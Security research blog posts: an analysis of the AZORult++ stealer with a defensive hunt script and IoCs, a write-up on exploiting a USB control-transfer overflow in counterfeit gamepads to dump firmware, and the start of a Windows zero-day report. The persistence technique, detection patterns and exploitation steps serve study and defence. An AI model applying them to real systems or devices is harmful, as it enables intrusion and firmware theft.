Kaspersky

March 22, 2019

AZORult++: Rewriting history

The AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.

But at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.


Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.


Examples of different versions of AZORult in operation (data encrypted using XOR)

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+--+-”, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+--+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.
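The chain described in this section (new local account, membership in Administrators, a SpecialAccounts\Userlist value of 0, RDP switched on) can be hunted for as one correlated sequence rather than as four separate low-signal events. The code below is an added example, not code from the article: the event records and the account name are constructed, and the normalized field names, the event IDs (Security 4720 and 4732, Sysmon 13) and the fDenyTSConnections value name are assumptions about the telemetry, since the article does not name them.

```python
from datetime import datetime, timedelta

# Matched case-insensitively against Sysmon's TargetObject field.
HIDE_KEY = r"\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist" + "\\"
RDP_VALUE = r"\control\terminal server\fdenytsconnections"  # assumption: not named in the article
ADMINS_SID = "S-1-5-32-544"                                 # built-in Administrators group
WINDOW = timedelta(minutes=5)                               # assumed correlation window
ZERO = "dword (0x00000000)"

# Constructed, already-normalized events (field names are hypothetical).
EVENTS = [
    {"ts": "2019-03-18T10:00:01", "host": "WS-01", "id": 4720, "target_user": "svc_helper"},
    {"ts": "2019-03-18T10:00:02", "host": "WS-01", "id": 4732, "target_user": "svc_helper",
     "group_sid": "S-1-5-32-544"},
    {"ts": "2019-03-18T10:00:03", "host": "WS-01", "id": 13, "details": "DWORD (0x00000000)",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
                      r"\SpecialAccounts\UserList\svc_helper"},
    {"ts": "2019-03-18T10:00:04", "host": "WS-01", "id": 13, "details": "DWORD (0x00000000)",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    # Ordinary user provisioning, RDP enabled much later by an administrator.
    {"ts": "2019-03-18T11:00:00", "host": "WS-02", "id": 4720, "target_user": "j.doe"},
    {"ts": "2019-03-18T11:00:05", "host": "WS-02", "id": 4732, "target_user": "j.doe",
     "group_sid": "S-1-5-32-545"},
    {"ts": "2019-03-18T11:30:00", "host": "WS-02", "id": 13, "details": "DWORD (0x00000000)",
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"},
    # New administrator, but nothing hidden and no RDP change.
    {"ts": "2019-03-18T12:00:00", "host": "WS-03", "id": 4720, "target_user": "tmpadmin"},
    {"ts": "2019-03-18T12:00:10", "host": "WS-03", "id": 4732, "target_user": "tmpadmin",
     "group_sid": "S-1-5-32-544"},
]


def classify(ev):
    """Return (stage, user) for events that belong to the chain, else None."""
    if ev["id"] == 4720:
        return "account_created", ev["target_user"].lower()
    if ev["id"] == 4732 and ev.get("group_sid") == ADMINS_SID:
        return "added_to_admins", ev["target_user"].lower()
    if ev["id"] == 13 and ev.get("details", "").lower() == ZERO:
        target = ev["target_object"].lower()
        if HIDE_KEY in target:
            # The value name under UserList is the account being hidden.
            return "account_hidden", target.rsplit("\\", 1)[1]
        if target.endswith(RDP_VALUE):
            return "rdp_enabled", None      # host-wide setting, no user attached
    return None


def hunt(events):
    """Flag accounts that are created, made admin and then hidden or paired with RDP."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append(
                (datetime.fromisoformat(ev["ts"]), *stage))
    findings = []
    for host, staged in by_host.items():
        for t0, name, user in staged:
            if name != "account_created":
                continue
            seen = set()
            for t, other, other_user in staged:
                if t0 <= t <= t0 + WINDOW and other_user in (user, None):
                    seen.add(other)
            if "added_to_admins" in seen and seen & {"account_hidden", "rdp_enabled"}:
                findings.append({"host": host, "user": user,
                                 "stages": sorted(seen), "complete": len(seen) == 4})
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```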

Conclusion

During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.

IoC

C&C servers
http://ravor.ac[.]ug
http://daticho.ac[.]ug

MD5
08EB8F2E441C26443EB9ABE5A93CD942
5B26880F80A00397BC379CAF5CADC564
B0EC3E594D20B9D38CC8591BAFF0148B
FE8938F0BAAF90516A90610F6E210484

March 21, 2019

Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0.

Who hacks video game consoles?

The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It’s a multi-billion dollar industry in which demand creates supply. You can now find devices for almost all the existing consoles that allow you to play copies of licensed video game ‘backups’ from flash drives, counterfeit gamepads and accessories, various adapters, some of which give you an advantage over other players, and devices for the use of cheats in online and offline video games. There are even services that let you buy video game achievements without having to spend hours playing. Of course, this is all sold without the consent of the video game console manufacturers.

Modern video game consoles, just like 20 years ago, are proprietary systems where the rules are set by the hardware manufacturers, and not by the millions of customers using those devices. A variety of protective measures are included in their design to ensure these consoles only run signed code, so they only play licensed and legally acquired video games and all players have equal rights and only play with officially licensed accessories. In some countries it’s even illegal to try and hack your own video game console.

But at the same time the very scale of the protection makes these consoles an attractive target and one big ‘crackme’ for enthusiasts interested in information security and reverse engineering. The more difficult the puzzle, the more interesting it is to solve. Especially if you’ve grown up with a love for video games.

Protection scheme of DualShock 4

Readers who follow my Twitter account may know that I’m a long-time fan of reverse engineering video game consoles and everything related to them, including unofficial game devices. In the early days of PlayStation 4, a publicly known vulnerability in the FreeBSD kernel (which PlayStation 4 is based on) let me and many other researchers take a look at the architecture and inner workings of the new game console from Sony. I carried out a lot of different research, some of which included looking at how USB authentication works in PlayStation 4 and how it distinguishes licensed devices and blocks unauthorized devices. This subject was of interest because I had previously done similar research on other consoles. PlayStation 4’s authentication scheme turned out to be much simpler than that used in Xbox 360, but no less effective.


Authorization scheme of PlayStation 4 USB accessories

PS4 sends 0x100 random bytes to DualShock 4 and in response the gamepad creates an RSASSA-PSS SHA-256 signature and sends it back along with the cryptographic constants N and E (public key) needed to verify it. These constants are unique to each manufactured DualShock 4 gamepad. The gamepad also sends a signature needed for verification of N and E. It uses the same RSASSA-PSS SHA-256 algorithm, but the cryptographic constants are the same for all PlayStation 4 consoles and are stored in the kernel.

This means that if you want to authenticate your own USB device, it’s not enough to hack the PlayStation 4 kernel – you need the private key stored inside the gamepad. And even if someone manages to hack a gamepad and obtains the private key, Sony can still blacklist the key with a firmware update. If after eight minutes a game console has not received an authentication response, it stops communication with the gamepad and you need to remove it from the USB port and plug it in again to get it to work. That’s how the early counterfeit gamepads worked: by simulating a USB port unplug/plug process every eight minutes, and it was very annoying for anyone who bought them.

Rumors of super counterfeit DualShock 4

There were no signs of anyone hacking this authentication scheme for quite some time until I heard rumors about new fake gamepads on the market that looked and worked just like the original. I really wanted to take a look at them, so I ordered a few from Chinese stores.

While I was waiting for my parcels to arrive, I decided to try and gather more information about counterfeit gamepads. After quite a few search requests I found a gamepad known as Gator Claw.


Unauthorized Gator Claw gamepad

There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.


Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.


Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. This is the Intel HEX file format, which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) can output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading it in a hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.


Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is the Reset vector, which is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware’s base address.
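To make the decoding step concrete, the following added example (not the author's tooling) decodes Intel HEX records with checksum validation and then reads the Cortex-M0 vector table from the result, checking that every handler is a Thumb address inside the image at the load address the file declares. The vector values, the 0x200-byte image and the encode_ihex helper exist only to build a constructed sample.

```python
import struct

# Cortex-M0 system exception slots (word index in the vector table -> name).
CORTEX_M0_VECTORS = {1: "Reset", 2: "NMI", 3: "HardFault",
                     11: "SVCall", 14: "PendSV", 15: "SysTick"}


def decode_ihex(text):
    """Decode Intel HEX text into (base_address, image bytes); ValueError on bad records."""
    mem, upper = {}, 0                      # upper: address bits set by type 02/04 records
    for n, line in enumerate(text.split(), 1):
        if not line.startswith(":"):
            raise ValueError(f"line {n}: missing ':' start code")
        raw = bytes.fromhex(line[1:])
        if len(raw) < 5 or raw[0] != len(raw) - 5:
            raise ValueError(f"line {n}: length field mismatch")
        if sum(raw) & 0xFF:                 # all bytes including the checksum sum to 0
            raise ValueError(f"line {n}: bad checksum")
        count, addr, rtype = raw[0], int.from_bytes(raw[1:3], "big"), raw[3]
        data = raw[4:4 + count]
        if rtype == 0x00:                   # data
            for i, b in enumerate(data):
                mem[upper + addr + i] = b
        elif rtype == 0x01:                 # end of file
            break
        elif rtype == 0x02:                 # extended segment address
            upper = int.from_bytes(data, "big") << 4
        elif rtype == 0x04:                 # extended linear address
            upper = int.from_bytes(data, "big") << 16
        # types 03/05 (start address) carry no image data and are skipped
    if not mem:
        raise ValueError("no data records")
    base, end = min(mem), max(mem) + 1
    return base, bytes(mem.get(a, 0xFF) for a in range(base, end))  # gaps = erased flash


def read_vector_table(base, image, sram=(0x20000000, 0x40000000)):
    """Extract initial SP and handlers; list anything inconsistent with this base."""
    if len(image) < 64:
        raise ValueError("image shorter than the 16-entry vector table")
    words = struct.unpack_from("<16I", image)
    report = {"base": base, "initial_sp": words[0],
              "sp_in_sram": sram[0] < words[0] <= sram[1],
              "handlers": {}, "problems": []}
    for idx, name in CORTEX_M0_VECTORS.items():
        value = words[idx]
        address = value & ~1                # bit 0 only marks Thumb state
        report["handlers"][name] = address
        if not value & 1:
            report["problems"].append(f"{name}: Thumb bit clear")
        if not base <= address < base + len(image):
            report["problems"].append(f"{name}: outside image")
    report["entry_point"] = report["handlers"]["Reset"]
    return report


def encode_ihex(base, data, width=16):
    """Helper used only to build the constructed sample (image must not cross 64 KB)."""
    def rec(rtype, addr, payload):
        body = bytes([len(payload)]) + addr.to_bytes(2, "big") + bytes([rtype]) + payload
        return ":" + (body + bytes([-sum(body) & 0xFF])).hex().upper()
    lines = [rec(0x04, 0, (base >> 16).to_bytes(2, "big"))]
    for off in range(0, len(data), width):
        lines.append(rec(0x00, (base + off) & 0xFFFF, data[off:off + width]))
    lines.append(rec(0x01, 0, b""))
    return "\n".join(lines)


def build_sample(base=0x00000000):
    """Constructed firmware: a vector table for load address 0 plus zero padding."""
    table = ([0x20004000, 0x000000D5, 0x000000E1, 0x000000E3] + [0] * 7 +
             [0x000000E5, 0, 0, 0x000000E7, 0x000000E9])
    return encode_ihex(base, struct.pack("<16I", *table) + bytes(0x1C0))


if __name__ == "__main__":
    base, image = decode_ihex(build_sample())
    print(read_vector_table(base, image))
```

Decoding the same table at a different load address fills the `problems` list, which is the base-address check the text describes.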

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.


Configuration file with description of different microcontrollers

After searching for the microcontroller identifiers from the config file, we found the site of the manufacturer – Nuvoton. Product information, along with technical documentation and the SDK, is freely available for download without any license agreements.


The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?


Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of the memory-mapped input/output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.


Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that is why many vendors only distribute the SDK after an NDA is signed.


Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too.

What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories.

Besides that, they also have a subsidiary, and their site has a huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.


Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.


Examples of product PCB design

Revelations

By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.


Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…


Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.


Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. The USB protocol defines two entities – a host and the devices that connect to it. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.


Connection scheme of USB devices

Data and control exchange between the devices and the host happens through a set of uni-directional or bi-directional pipes. By pipes we mean data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.


Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented with the use of packets provided according to the scheme below.


Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.


Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers or Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. All USB devices, however, support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.


Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.


Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.

Exploitation

To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.


Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and depending on the type of report it will either send data with the function USBD_PrepareCntrlIn() or will receive with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.


Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.
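The missing check can be shown in a small model of the control pipe. This is an added example in Python, not the Gator Claw or Nuvoton code: the memory layout, the buffer and packet sizes and the names Device, hid_setup and data_packets are hypothetical, and the hardened branch bounds the host-supplied wLength by the size of the report buffer.

```python
import struct
from dataclasses import dataclass

MAX_PACKET = 64     # size of ONE data packet on endpoint 0 (constructed value)
REPORT_SIZE = 48    # size of the report buffer the handler serves (constructed value)

# bmRequestType, bRequest, wValue for the two HID class requests used here.
HID_REQUESTS = {"GET_REPORT": (0xA1, 0x01, 0x0100), "SET_REPORT": (0x21, 0x09, 0x0200)}


@dataclass
class Setup:
    bmRequestType: int
    bRequest: int
    wValue: int
    wIndex: int
    wLength: int        # 16-bit transfer length chosen by the host

    @classmethod
    def parse(cls, raw):
        if len(raw) != 8:
            raise ValueError("a SETUP packet is exactly 8 bytes")
        return cls(*struct.unpack("<BBHHH", raw))


def hid_setup(request, length):
    """Raw SETUP bytes for a HID class request asking for `length` bytes."""
    bm_request_type, b_request, w_value = HID_REQUESTS[request]
    return struct.pack("<BBHHH", bm_request_type, b_request, w_value, 0, length)


def data_packets(w_length):
    """Number of DATA packets a Control Transfer of w_length bytes is split into."""
    return -(-w_length // MAX_PACKET)


class Device:
    """Constructed device memory: the report buffer is followed by unrelated data."""

    def __init__(self):
        self.mem = bytearray(b"R" * REPORT_SIZE + b"<adjacent firmware data>" + bytes(208))

    def get_report(self, raw_setup, hardened):
        setup = Setup.parse(raw_setup)
        if hardened:
            # A short reply is legal on an IN transfer: never send more than the buffer holds.
            length = min(setup.wLength, REPORT_SIZE)
        else:
            # The flaw described above: wLength is trusted as the copy length.
            length = setup.wLength
        return bytes(self.mem[:length])

    def set_report(self, raw_setup, data, hardened):
        setup = Setup.parse(raw_setup)
        if hardened and (setup.wLength > REPORT_SIZE or len(data) > setup.wLength):
            return "STALL"              # refuse transfers larger than the buffer
        n = min(len(data), setup.wLength, len(self.mem))
        self.mem[:n] = data[:n]         # unhardened: writes past the report buffer
        return "ACK"


if __name__ == "__main__":
    request = hid_setup("GET_REPORT", 0x100)
    print(data_packets(0x100), "packets for one transfer")
    print(len(Device().get_report(request, hardened=False)), "bytes without the check")
    print(len(Device().get_report(request, hardened=True)), "bytes with the check")
```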


Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is memory that, among other things, holds the stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 kb during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).


Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.


Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.


Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.


Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.


Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.


Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates exploitation and allows exploits to be debugged.


UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.


Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).


Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.


Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.


Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ASCII) identifier of the product and an array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.


Revealing the firmware update encryption key

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.

Conclusion

This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also helps enthusiasts create their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.

March 13, 2019

The fourth horseman: CVE-2019-0797 vulnerability

In February 2019, our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. We reported it to Microsoft on February 22, 2019. The company confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft have just released a patch, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery:

This is the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows we have discovered recently using our technologies. Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA).

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Brief technical details – CVE-2019-0797

CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection. The vulnerable code can be observed below on screenshots made on an up-to-date system during initial analysis:

Snippet of NtDCompositionDiscardFrame syscall (Windows 8.1)

On this screenshot with the simplified logic of the NtDCompositionDiscardFrame syscall you can see that this code acquires a lock that is related to frame operations in the structure DirectComposition::CConnection and tries to find a frame that corresponds to a given id and will eventually call a free on it. The problem with this can be observed on the second screenshot:

